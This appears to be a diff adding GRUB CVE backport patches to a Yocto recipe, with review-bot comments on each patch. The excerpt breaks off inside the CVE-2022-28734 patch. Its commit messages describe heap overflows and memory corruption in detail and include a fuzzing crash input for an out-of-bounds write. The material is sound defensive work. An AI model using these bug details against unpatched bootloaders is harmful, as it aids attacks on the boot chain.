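Review bot: `xnu_ramdisk`, in the last context lines of the xnu.c hunk, stays on plain `grub_register_command`, while the commit message says the shim_lock verifier validates only the XNU kernels. If the ramdisk is likewise not verified it would need `grub_register_command_lockdown` as well; the verifier is not shown here, so this should be confirmed rather than assumed. A comment above the three changed calls, e.g. `/* Extensions and packages are not covered by shim_lock; restricted under lockdown. */`, would record why they differ from the kernel commands. GRUB_MOD_INIT(xnu) starts before and continues past the hunk, so its other registrations are not visible.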
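--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27779_7.patch
@@ -0,0 +1,65 @@
+From dcc5a434e59f721b03cc809db0375a24aa2ac6d0 Mon Sep 17 00:00:00 2001
+From: Javier Martinez Canillas <javierm@redhat.com>
+Date: Sat, 7 Nov 2020 01:03:18 +0100
+Subject: [PATCH] docs: Document the cutmem command
+
+The command is not present in the docs/grub.texi user documentation.
+
+Reported-by: Daniel Kiper <daniel.kiper@oracle.com>
+Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
+Signed-off-by: Daniel Kiper <daniel.kiper@oracle.com>
+Reviewed-by: Javier Martinez Canillas <javierm@redhat.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=f05e79a0143beb2d9a482a3ebf4fe0ce76778122]
+CVE: CVE-2020-27779
+Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
+---
+ docs/grub.texi | 21 +++++++++++++++++++++
+ 1 file changed, 21 insertions(+)
+
+diff --git a/docs/grub.texi b/docs/grub.texi
+index ccf1908..ae85f55 100644
+--- a/docs/grub.texi
++++ b/docs/grub.texi
+@@ -3892,6 +3892,7 @@ you forget a command, you can run the command @command{help}
+ * cpuid:: Check for CPU features
+ * crc:: Compute or check CRC32 checksums
+ * cryptomount:: Mount a crypto device
++* cutmem:: Remove memory regions
+ * date:: Display or set current date and time
+ * devicetree:: Load a device tree blob
+ * distrust:: Remove a pubkey from trusted keys
+@@ -4051,6 +4052,8 @@ this page is to be filtered. This syntax makes it easy to represent patterns
+ that are often result of memory damage, due to physical distribution of memory
+ cells.
+
++The command is similar to @command{cutmem} command.
++
+ Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
+ This prevents removing EFI memory regions to potentially subvert the
+ security mechanisms provided by the UEFI secure boot.
+@@ -4214,6 +4217,24 @@ GRUB suports devices encrypted using LUKS and geli. Note that necessary modules
+ be used.
+ @end deffn
+
++@node cutmem
++@subsection cutmem
++
++@deffn Command cutmem from[K|M|G] to[K|M|G]
++Remove any memory regions in specified range.
++@end deffn
++
++This command notifies the memory manager that specified regions of RAM ought to
++be filtered out. This remains in effect after a payload kernel has been loaded
++by GRUB, as long as the loaded kernel obtains its memory map from GRUB. Kernels
++that support this include Linux, GNU Mach, the kernel of FreeBSD and Multiboot
++kernels in general.
++
++The command is similar to @command{badram} command.
++
++Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
++ This prevents removing EFI memory regions to potentially subvert the
++ security mechanisms provided by the UEFI secure boot.
+
+ @node date
+ @subsection date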
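--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20225.patch
@@ -0,0 +1,58 @@
+From 2a330dba93ff11bc00eda76e9419bc52b0c7ead6 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 16:07:29 +1100
+Subject: lib/arg: Block repeated short options that require an argument
+
+Fuzzing found the following crash:
+
+ search -hhhhhhhhhhhhhf
+
+We didn't allocate enough option space for 13 hints because the
+allocation code counts the number of discrete arguments (i.e. argc).
+However, the shortopt parsing code will happily keep processing
+a combination of short options without checking if those short
+options require an argument. This means you can easily end writing
+past the allocated option space.
+
+This fixes a OOB write which can cause heap corruption.
+
+Fixes: CVE-2021-20225
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2a330dba93ff11bc00eda76e9419bc52b0c7ead6]
+CVE: CVE-2021-20225
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/lib/arg.c | 13 +++++++++++++
+ 1 file changed, 13 insertions(+)
+
+diff --git a/grub-core/lib/arg.c b/grub-core/lib/arg.c
+index 3288609..537c5e9 100644
+--- a/grub-core/lib/arg.c
++++ b/grub-core/lib/arg.c
+@@ -299,6 +299,19 @@ grub_arg_parse (grub_extcmd_t cmd, int argc, char **argv,
+ it can have an argument value. */
+ if (*curshort)
+ {
++ /*
++ * Only permit further short opts if this one doesn't
++ * require a value.
++ */
++ if (opt->type != ARG_TYPE_NONE &&
++ !(opt->flags & GRUB_ARG_OPTION_OPTIONAL))
++ {
++ grub_error (GRUB_ERR_BAD_ARGUMENT,
++ N_("missing mandatory option for `%s'"),
++ opt->longarg);
++ goto fail;
++ }
++
+ if (parse_option (cmd, opt, 0, usr) || grub_errno)
+ goto fail;
+ }
+--
+2.25.1
+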
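Review bot: The new guard in the `if (*curshort)` branch exempts options flagged `GRUB_ARG_OPTION_OPTIONAL`, so a cluster of repeated short options of that kind still reaches `parse_option`. The commit message says the option space is sized from argc, so it is worth confirming that no option is both optional-valued and repeatable; the allocation and parse_option are outside the hunk and cannot be checked from here. The existing comment could record the reason, e.g. `/* Option space is sized from argc, so a value-taking short opt must end the cluster. */`. The error also prints `opt->longarg` although the user typed the short form, which will read poorly if a short-only option can have no long name. grub_arg_parse starts before and continues past the hunk.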
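--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-20233.patch
@@ -0,0 +1,50 @@
+From 2f533a89a8dfcacbf2c9dbc77d910f111f24bf33 Mon Sep 17 00:00:00 2001
+From: Daniel Axtens <dja@axtens.net>
+Date: Fri, 22 Jan 2021 17:10:48 +1100
+Subject: commands/menuentry: Fix quoting in setparams_prefix()
+
+Commit 9acdcbf32542 (use single quotes in menuentry setparams command)
+says that expressing a quoted single quote will require 3 characters. It
+actually requires (and always did require!) 4 characters:
+
+ str: a'b => a'\''b
+ len: 3 => 6 (2 for the letters + 4 for the quote)
+
+This leads to not allocating enough memory and thus out of bounds writes
+that have been observed to cause heap corruption.
+
+Allocate 4 bytes for each single quote.
+
+Commit 22e7dbb2bb81 (Fix quoting in legacy parser.) does the same
+quoting, but it adds 3 as extra overhead on top of the single byte that
+the quote already needs. So it's correct.
+
+Fixes: 9acdcbf32542 (use single quotes in menuentry setparams command)
+Fixes: CVE-2021-20233
+
+Reported-by: Daniel Axtens <dja@axtens.net>
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=2f533a89a8dfcacbf2c9dbc77d910f111f24bf33]
+CVE: CVE-2021-20233
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/commands/menuentry.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/grub-core/commands/menuentry.c b/grub-core/commands/menuentry.c
+index 9164df7..720e6d8 100644
+--- a/grub-core/commands/menuentry.c
++++ b/grub-core/commands/menuentry.c
+@@ -230,7 +230,7 @@ setparams_prefix (int argc, char **args)
+ len += 3; /* 3 = 1 space + 2 quotes */
+ p = args[i];
+ while (*p)
+- len += (*p++ == '\'' ? 3 : 1);
++ len += (*p++ == '\'' ? 4 : 1);
+ }
+
+ result = grub_malloc (len + 2);
+--
+2.25.1
+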
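Review bot: The constant 4 in `len += (*p++ == '\'' ? 4 : 1);` has no comment, although the neighbouring `len += 3` explains its own constant and this sum is what sizes `grub_malloc (len + 2)`. I would add `/* a ' is emitted as '\'' : 4 bytes */` on that line so the sizing rule is visible where it is applied. The code that writes the quoted string lies outside the hunk, so when refreshing this backport confirm that the writer and this length loop still agree.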
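--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3695.patch
@@ -0,0 +1,178 @@
+From 0693d672abcf720419f86c56bda6428c540e2bb1 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:01:35 +0530
+Subject: [PATCH] CVE-2021-3695
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=e623866d9286410156e8b9d2c82d6253a1b22d08]
+CVE: CVE-2021-3695
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+ video/readers/png: Drop greyscale support to fix heap out-of-bounds write
+
+A 16-bit greyscale PNG without alpha is processed in the following loop:
+
+ for (i = 0; i < (data->image_width * data->image_height);
+ i++, d1 += 4, d2 += 2)
+{
+ d1[R3] = d2[1];
+ d1[G3] = d2[1];
+ d1[B3] = d2[1];
+}
+
+The increment of d1 is wrong. d1 is incremented by 4 bytes per iteration,
+but there are only 3 bytes allocated for storage. This means that image
+data will overwrite somewhat-attacker-controlled parts of memory - 3 bytes
+out of every 4 following the end of the image.
+
+This has existed since greyscale support was added in 2013 in commit
+3ccf16dff98f (grub-core/video/readers/png.c: Support grayscale).
+
+Saving starfield.png as a 16-bit greyscale image without alpha in the gimp
+and attempting to load it causes grub-emu to crash - I don't think this code
+has ever worked.
+
+Delete all PNG greyscale support.
+
+Fixes: CVE-2021-3695
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 89 ++++-------------------------------
+ 1 file changed, 8 insertions(+), 81 deletions(-)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 0157ff7..db4a9d4 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -100,7 +100,7 @@ struct grub_png_data
+
+ unsigned image_width, image_height;
+ int bpp, is_16bit;
+- int raw_bytes, is_gray, is_alpha, is_palette;
++ int raw_bytes, is_alpha, is_palette;
+ int row_bytes, color_bits;
+ grub_uint8_t *image_data;
+
+@@ -280,13 +280,13 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ data->bpp = 3;
+ else
+ {
+- data->is_gray = 1;
+- data->bpp = 1;
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: color type not supported");
+ }
+
+ if ((color_bits != 8) && (color_bits != 16)
+ && (color_bits != 4
+- || !(data->is_gray || data->is_palette)))
++ || !data->is_palette))
+ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
+ "png: bit depth must be 8 or 16");
+
+@@ -315,7 +315,7 @@ grub_png_decode_image_header (struct grub_png_data *data)
+ }
+
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+- if (data->is_16bit || data->is_gray || data->is_palette)
++ if (data->is_16bit || data->is_palette)
+ #endif
+ {
+ data->image_data = grub_calloc (data->image_height, data->row_bytes);
+@@ -859,27 +859,8 @@ grub_png_convert_image (struct grub_png_data *data)
+ int shift;
+ int mask = (1 << data->color_bits) - 1;
+ unsigned j;
+- if (data->is_gray)
+- {
+- /* Generic formula is
+- (0xff * i) / ((1U << data->color_bits) - 1)
+- but for allowed bit depth of 1, 2 and for it's
+- equivalent to
+- (0xff / ((1U << data->color_bits) - 1)) * i
+- Precompute the multipliers to avoid division.
+- */
+-
+- const grub_uint8_t multipliers[5] = { 0xff, 0xff, 0x55, 0x24, 0x11 };
+- for (i = 0; i < (1U << data->color_bits); i++)
+- {
+- grub_uint8_t col = multipliers[data->color_bits] * i;
+- palette[i][0] = col;
+- palette[i][1] = col;
+- palette[i][2] = col;
+- }
+- }
+- else
+- grub_memcpy (palette, data->palette, 3 << data->color_bits);
++
++ grub_memcpy (palette, data->palette, 3 << data->color_bits);
+ d1c = d1;
+ d2c = d2;
+ for (j = 0; j < data->image_height; j++, d1c += data->image_width * 3,
+@@ -917,61 +898,7 @@ grub_png_convert_image (struct grub_png_data *data)
+ return;
+ }
+
+- if (data->is_gray)
+- {
+- switch (data->bpp)
+- {
+- case 4:
+- /* 16-bit gray with alpha. */
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 4)
+- {
+- d1[R4] = d2[3];
+- d1[G4] = d2[3];
+- d1[B4] = d2[3];
+- d1[A4] = d2[1];
+- }
+- break;
+- case 2:
+- if (data->is_16bit)
+- /* 16-bit gray without alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R3] = d2[1];
+- d1[G3] = d2[1];
+- d1[B3] = d2[1];
+- }
+- }
+- else
+- /* 8-bit gray with alpha. */
+- {
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 4, d2 += 2)
+- {
+- d1[R4] = d2[1];
+- d1[G4] = d2[1];
+- d1[B4] = d2[1];
+- d1[A4] = d2[0];
+- }
+- }
+- break;
+- /* 8-bit gray without alpha. */
+- case 1:
+- for (i = 0; i < (data->image_width * data->image_height);
+- i++, d1 += 3, d2++)
+- {
+- d1[R3] = d2[0];
+- d1[G3] = d2[0];
+- d1[B3] = d2[0];
+- }
+- break;
+- }
+- return;
+- }
+-
+- {
++ {
+ /* Only copy the upper 8 bit. */
+ #ifndef GRUB_CPU_WORDS_BIGENDIAN
+ for (i = 0; i < (data->image_width * data->image_height * data->bpp >> 1);
+--
+2.25.1
+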
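Review bot: Every greyscale PNG is now rejected in grub_png_decode_image_header with `png: color type not supported`, not only the 16-bit-without-alpha case that overflowed. Any greyscale theme or background image shipped with an image built from this recipe will stop loading and has to be re-encoded as RGB or palette. Nothing in the new code records that this is deliberate, so I would add `/* Greyscale support removed: CVE-2021-3695. */` above the new `return grub_error (...)`. The check that follows still reports `png: bit depth must be 8 or 16` although the new condition `color_bits != 4 || !data->is_palette` also accepts 4-bit palette images, so the message does not match what is rejected.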
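--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3696.patch
@@ -0,0 +1,46 @@
+From b18ce59d6496a9313d75f9497a0efac61dcf4191 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 20 Jul 2022 10:05:42 +0530
+Subject: [PATCH] CVE-2021-3696
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=210245129c932dc9e1c2748d9d35524fb95b5042]
+CVE: CVE-2021-3696
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/png: Avoid heap OOB R/W inserting huff table items
+
+In fuzzing we observed crashes where a code would attempt to be inserted
+into a huffman table before the start, leading to a set of heap OOB reads
+and writes as table entries with negative indices were shifted around and
+the new code written in.
+
+Catch the case where we would underflow the array and bail.
+
+Fixes: CVE-2021-3696
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/png.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/grub-core/video/readers/png.c b/grub-core/video/readers/png.c
+index 36b3f10..3c05951 100644
+--- a/grub-core/video/readers/png.c
++++ b/grub-core/video/readers/png.c
+@@ -416,6 +416,13 @@ grub_png_insert_huff_item (struct huff_table *ht, int code, int len)
+ for (i = len; i < ht->max_length; i++)
+ n += ht->maxval[i];
+
++ if (n > ht->num_values)
++ {
++ grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "png: out of range inserting huffman table item");
++ return;
++ }
++
+ for (i = 0; i < n; i++)
+ ht->values[ht->num_values - i] = ht->values[ht->num_values - i - 1];
+
+--
+2.25.1
+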
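Review bot: grub_png_insert_huff_item signals the new out-of-range case only through grub_error() and a bare `return;`, so the fix holds only if its callers test grub_errno before they continue decoding. Those callers are outside the hunk and should be checked in the tree this backport applies to. The guard covers the low side of the shift only: the first loop iteration still writes `ht->values[ht->num_values]`, and no check against the table's capacity is visible here. I would also document the guard with `/* n > num_values would shift entries below values[0]. */`.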
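--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3697.patch
@@ -0,0 +1,82 @@
+From 4de9de9d14f4ac27229e45514627534e32cc4406 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Tue, 19 Jul 2022 11:13:02 +0530
+Subject: [PATCH] CVE-2021-3697
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=22a3f97d39f6a10b08ad7fd1cc47c4dcd10413f6]
+CVE: CVE-2021-3697
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+video/readers/jpeg: Block int underflow -> wild pointer write
+
+Certain 1 px wide images caused a wild pointer write in
+grub_jpeg_ycrcb_to_rgb(). This was caused because in grub_jpeg_decode_data(),
+we have the following loop:
+
+for (; data->r1 < nr1 && (!data->dri || rst);
+ data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
+
+We did not check if vb * width >= hb * nc1.
+
+On a 64-bit platform, if that turns out to be negative, it will underflow,
+be interpreted as unsigned 64-bit, then be added to the 64-bit pointer, so
+we see data->bitmap_ptr jump, e.g.:
+
+0x6180_0000_0480 to
+0x6181_0000_0498
+ ^
+ ~--- carry has occurred and this pointer is now far away from
+ any object.
+
+On a 32-bit platform, it will decrement the pointer, creating a pointer
+that won't crash but will overwrite random data.
+
+Catch the underflow and error out.
+
+Fixes: CVE-2021-3697
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/video/readers/jpeg.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/video/readers/jpeg.c b/grub-core/video/readers/jpeg.c
+index 31359a4..545a60b 100644
+--- a/grub-core/video/readers/jpeg.c
++++ b/grub-core/video/readers/jpeg.c
+@@ -23,6 +23,7 @@
+ #include <grub/mm.h>
+ #include <grub/misc.h>
+ #include <grub/bufio.h>
++#include <grub/safemath.h>
+
+ GRUB_MOD_LICENSE ("GPLv3+");
+
+@@ -617,6 +618,7 @@ static grub_err_t
+ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ {
+ unsigned c1, vb, hb, nr1, nc1;
++ unsigned stride_a, stride_b, stride;
+ int rst = data->dri;
+
+ vb = 8 << data->log_vs;
+@@ -624,8 +626,14 @@ grub_jpeg_decode_data (struct grub_jpeg_data *data)
+ nr1 = (data->image_height + vb - 1) >> (3 + data->log_vs);
+ nc1 = (data->image_width + hb - 1) >> (3 + data->log_hs);
+
++ if (grub_mul(vb, data->image_width, &stride_a) ||
++ grub_mul(hb, nc1, &stride_b) ||
++ grub_sub(stride_a, stride_b, &stride))
++ return grub_error (GRUB_ERR_BAD_FILE_TYPE,
++ "jpeg: cannot decode image with these dimensions");
++
+ for (; data->r1 < nr1 && (!data->dri || rst);
+- data->r1++, data->bitmap_ptr += (vb * data->image_width - hb * nc1) * 3)
++ data->r1++, data->bitmap_ptr += stride * 3)
+ for (c1 = 0; c1 < nc1 && (!data->dri || rst);
+ c1++, rst--, data->bitmap_ptr += hb * 3)
+ {
+--
+2.25.1
+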
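Review bot: The `stride * 3` in the new loop increment is still an unchecked `unsigned` multiplication, so a stride that passes the three new checks can wrap there and move `data->bitmap_ptr` by the wrong amount. Whether the image dimensions are bounded tightly enough elsewhere to rule that out is not visible in this hunk. Folding it into the same guard keeps all the arithmetic checked: `grub_sub(stride_a, stride_b, &stride) || grub_mul(stride, 3, &stride))`, then `data->r1++, data->bitmap_ptr += stride)`. The inner loop's `hb * 3` and the rest of grub_jpeg_decode_data continue outside the hunk.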
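--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2021-3981.patch
@@ -0,0 +1,32 @@
+From 67740c43c9326956ea5cd6be77f813b5499a56a5 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 27 Jun 2022 10:15:29 +0530
+Subject: [PATCH] CVE-2021-3981
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/diff/util/grub-mkconfig.in?id=0adec29674561034771c13e446069b41ef41e4d4]
+CVE: CVE-2021-3981
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ util/grub-mkconfig.in | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/util/grub-mkconfig.in b/util/grub-mkconfig.in
+index 9f477ff..ead94a6 100644
+--- a/util/grub-mkconfig.in
++++ b/util/grub-mkconfig.in
+@@ -287,7 +287,11 @@ and /etc/grub.d/* files or please file a bug report with
+ exit 1
+ else
+ # none of the children aborted with error, install the new grub.cfg
+- mv -f ${grub_cfg}.new ${grub_cfg}
++ oldumask=$(umask)
++ umask 077
++ cat ${grub_cfg}.new > ${grub_cfg}
++ umask $oldumask
++ rm -f ${grub_cfg}.new
+ fi
+ fi
+
+--
+2.25.1
+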
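Review bot: The exit status of `cat ${grub_cfg}.new > ${grub_cfg}` is not checked before `rm -f ${grub_cfg}.new`, so a failed or short write (full filesystem, I/O error) leaves a truncated grub.cfg and then deletes the only complete copy. The `mv -f` it replaces had no such window. I would write `if cat "${grub_cfg}.new" > "${grub_cfg}"; then rm -f "${grub_cfg}.new"; fi` and quote the variable wherever it is used. `umask 077` only affects a grub.cfg that does not exist yet, while an existing file keeps its mode; that deserves a comment such as `# keep the mode of an existing grub.cfg; create a new one as 0600`. The enclosing if/else begins outside the hunk.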
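--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-2601.patch
@@ -0,0 +1,87 @@
+From e8060722acf0bcca037982d7fb29472363ccdfd4 Mon Sep 17 00:00:00 2001
+From: Zhang Boyang <zhangboyang.id@gmail.com>
+Date: Fri, 5 Aug 2022 01:58:27 +0800
+Subject: [PATCH] font: Fix several integer overflows in
+ grub_font_construct_glyph()
+
+This patch fixes several integer overflows in grub_font_construct_glyph().
+Glyphs of invalid size, zero or leading to an overflow, are rejected.
+The inconsistency between "glyph" and "max_glyph_size" when grub_malloc()
+returns NULL is fixed too.
+
+Fixes: CVE-2022-2601
+
+Reported-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Signed-off-by: Zhang Boyang <zhangboyang.id@gmail.com>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+
+Signed-off-by: Xiangyu Chen <xiangyu.chen@windriver.com>
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=768e1ef2fc159f6e14e7246e4be09363708ac39e]
+CVE: CVE-2022-2601
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ grub-core/font/font.c | 29 +++++++++++++++++------------
+ 1 file changed, 17 insertions(+), 12 deletions(-)
+
+diff --git a/grub-core/font/font.c b/grub-core/font/font.c
+index df17dba..f110db9 100644
+--- a/grub-core/font/font.c
++++ b/grub-core/font/font.c
+@@ -1509,6 +1509,7 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ struct grub_video_signed_rect bounds;
+ static struct grub_font_glyph *glyph = 0;
+ static grub_size_t max_glyph_size = 0;
++ grub_size_t cur_glyph_size;
+
+ ensure_comb_space (glyph_id);
+
+@@ -1525,29 +1526,33 @@ grub_font_construct_glyph (grub_font_t hinted_font,
+ if (!glyph_id->ncomb && !glyph_id->attributes)
+ return main_glyph;
+
+- if (max_glyph_size < sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT)
++ if (grub_video_bitmap_calc_1bpp_bufsz (bounds.width, bounds.height, &cur_glyph_size) ||
++ grub_add (sizeof (*glyph), cur_glyph_size, &cur_glyph_size))
++ return main_glyph;
++
++ if (max_glyph_size < cur_glyph_size)
+ {
+ grub_free (glyph);
+- max_glyph_size = (sizeof (*glyph) + (bounds.width * bounds.height + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT) * 2;
+- if (max_glyph_size < 8)
+- max_glyph_size = 8;
+- glyph = grub_malloc (max_glyph_size);
++ if (grub_mul (cur_glyph_size, 2, &max_glyph_size))
++ max_glyph_size = 0;
++ glyph = max_glyph_size > 0 ? grub_malloc (max_glyph_size) : NULL;
+ }
+ if (!glyph)
+ {
++ max_glyph_size = 0;
+ grub_errno = GRUB_ERR_NONE;
+ return main_glyph;
+ }
+
+- grub_memset (glyph, 0, sizeof (*glyph)
+- + (bounds.width * bounds.height
+- + GRUB_CHAR_BIT - 1) / GRUB_CHAR_BIT);
++ grub_memset (glyph, 0, cur_glyph_size);
+
+ glyph->font = main_glyph->font;
+- glyph->width = bounds.width;
+- glyph->height = bounds.height;
+- glyph->offset_x = bounds.x;
+- glyph->offset_y = bounds.y;
++ if (bounds.width == 0 || bounds.height == 0 ||
++ grub_cast (bounds.width, &glyph->width) ||
++ grub_cast (bounds.height, &glyph->height) ||
++ grub_cast (bounds.x, &glyph->offset_x) ||
++ grub_cast (bounds.y, &glyph->offset_y))
++ return main_glyph;
+
+ if (glyph_id->attributes & GRUB_UNICODE_GLYPH_ATTRIBUTE_MIRROR)
+ grub_font_blit_glyph_mirror (glyph, main_glyph,
+--
+2.25.1
+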
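Review bot: The new code calls `grub_video_bitmap_calc_1bpp_bufsz ()` and `grub_cast ()`, yet the diffstat touches only grub-core/font/font.c, so both helpers must come from patches applied earlier in the recipe. The same applies to the safemath include behind `grub_add`/`grub_mul`, which this hunk does not add. If the ordering is wrong or a prerequisite is missing, the build fails, or the patch gets dropped while the CVE is still assumed fixed. I would record the dependency in the patch header, e.g. `Depends-on: <patch adding grub_cast and grub_video_bitmap_calc_1bpp_bufsz>` (placeholder name), and confirm the series order in the recipe. grub_font_construct_glyph starts and ends outside these hunks.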
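--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28733.patch
@@ -0,0 +1,60 @@
+From 415fb5eb83cbd3b5cfc25ac1290f2de4fe3d231c Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:48:34 +0530
+Subject: [PATCH] CVE-2022-28733
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=3e4817538de828319ba6d59ced2fbb9b5ca13287]
+CVE: CVE-2022-28733
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/ip: Do IP fragment maths safely
+
+We can receive packets with invalid IP fragmentation information. This
+can lead to rsm->total_len underflowing and becoming very large.
+
+Then, in grub_netbuff_alloc(), we add to this very large number, which can
+cause it to overflow and wrap back around to a small positive number.
+The allocation then succeeds, but the resulting buffer is too small and
+subsequent operations can write past the end of the buffer.
+
+Catch the underflow here.
+
+Fixes: CVE-2022-28733
+
+Signed-off-by: Daniel Axtens <dja@axtens.net>
+Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
+---
+ grub-core/net/ip.c | 10 +++++++++-
+ 1 file changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/grub-core/net/ip.c b/grub-core/net/ip.c
+index ea5edf8..74e4e8b 100644
+--- a/grub-core/net/ip.c
++++ b/grub-core/net/ip.c
+@@ -25,6 +25,7 @@
+ #include <grub/net/netbuff.h>
+ #include <grub/mm.h>
+ #include <grub/priority_queue.h>
++#include <grub/safemath.h>
+ #include <grub/time.h>
+
+ struct iphdr {
+@@ -512,7 +513,14 @@ grub_net_recv_ip4_packets (struct grub_net_buff *nb,
+ {
+ rsm->total_len = (8 * (grub_be_to_cpu16 (iph->frags) & OFFSET_MASK)
+ + (nb->tail - nb->data));
+- rsm->total_len -= ((iph->verhdrlen & 0xf) * sizeof (grub_uint32_t));
++
++ if (grub_sub (rsm->total_len, (iph->verhdrlen & 0xf) * sizeof (grub_uint32_t),
++ &rsm->total_len))
++ {
++ grub_dprintf ("net", "IP reassembly size underflow\n");
++ return GRUB_ERR_NONE;
++ }
++
+ rsm->asm_netbuff = grub_netbuff_alloc (rsm->total_len);
+ if (!rsm->asm_netbuff)
+ {
+--
+2.25.1
+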
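Review bot: `grub_sub ()` is given `&rsm->total_len` as its result pointer. When the underflow check fires, the function can therefore return with rsm->total_len holding the wrapped value, because the overflow builtin behind grub_sub stores its result even on failure, and nothing in the hunk resets it or discards the reassembly entry. Whether later fragments for the same entry read that field is outside the hunk, so this is a point to confirm rather than a proven defect. The safer form is to subtract into a local of the same type and assign `rsm->total_len` only on success. The drop is also reported only through `grub_dprintf ("net", ...)`, so malformed fragments leave no trace unless debug output is enabled.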
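--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2022-28734.patch
@@ -0,0 +1,67 @@
+From f03f09c2a07eae7f3a4646e33a406ae2689afb9e Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Mon, 1 Aug 2022 10:59:41 +0530
+Subject: [PATCH] CVE-2022-28734
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/gitweb/?p=grub.git;a=commit;h=b26b4c08e7119281ff30d0fb4a6169bd2afa8fe4]
+CVE: CVE-2022-28734
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+net/http: Fix OOB write for split http headers
+
+GRUB has special code for handling an http header that is split
+across two packets.
+
+The code tracks the end of line by looking for a "\n" byte. The
+code for split headers has always advanced the pointer just past the
+end of the line, whereas the code that handles unsplit headers does
+not advance the pointer. This extra advance causes the length to be
+one greater, which breaks an assumption in parse_line(), leading to
+it writing a NUL byte one byte past the end of the buffer where we
+reconstruct the line from the two packets.
+
+It's conceivable that an attacker controlled set of packets could
+cause this to zero out the first byte of the "next" pointer of the
+grub_mm_region structure following the current_line buffer.
+
+Do not advance the pointer in the split header case.
+
+Fixes: CVE-2022-28734
+---
+ grub-core/net/http.c | 12 +++++++++---
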